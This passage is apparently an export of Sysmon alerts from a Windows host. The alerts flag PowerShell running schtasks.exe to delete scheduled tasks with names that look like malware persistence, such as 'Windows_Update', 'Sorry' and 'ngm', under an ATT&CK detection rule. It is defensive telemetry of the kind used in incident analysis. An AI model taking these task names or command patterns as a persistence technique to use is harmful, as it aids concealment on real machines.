Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.345",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.537 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-001041243100} +ProcessId: 6840 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe 
+CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update_windows /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.542243400Z"",""eventRecordID"":""3942"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.537\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-001041243100}\r\nProcessId: 6840\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 
1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.537"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-001041243100}"",""processId"":""6840"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update_windows /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.326",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.452 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-001096223100} +ProcessId: 
7288 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Windows_Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.480772700Z"",""eventRecordID"":""3941"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.452\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-001096223100}\r\nProcessId: 7288\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.452"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-001096223100}"",""processId"":""7288"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Windows_Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.316",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.402 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-0010be1f3100} +ProcessId: 2712 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Sorry /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.408938200Z"",""eventRecordID"":""3940"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.402\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-0010be1f3100}\r\nProcessId: 2712\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.402"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-0010be1f3100}"",""processId"":""2712"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Sorry /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.299",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.369 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-0010921d3100} +ProcessId: 7780 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ngm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.372537100Z"",""eventRecordID"":""3939"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.369\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-0010921d3100}\r\nProcessId: 7780\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:39.369"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-0010921d3100}"",""processId"":""7780"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ngm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.285",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.340 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-0010d51b3100} +ProcessId: 4744 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN gm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium 
+Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.344709400Z"",""eventRecordID"":""3938"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.340\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-0010d51b3100}\r\nProcessId: 4744\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.340"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-0010d51b3100}"",""processId"":""4744"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN gm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.252",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.306 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-001055193100} +ProcessId: 944 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for products"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.313255500Z"",""eventRecordID"":""3937"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.306\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-001055193100}\r\nProcessId: 944\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: 
{df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.306"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-001055193100}"",""processId"":""944"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for products\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo 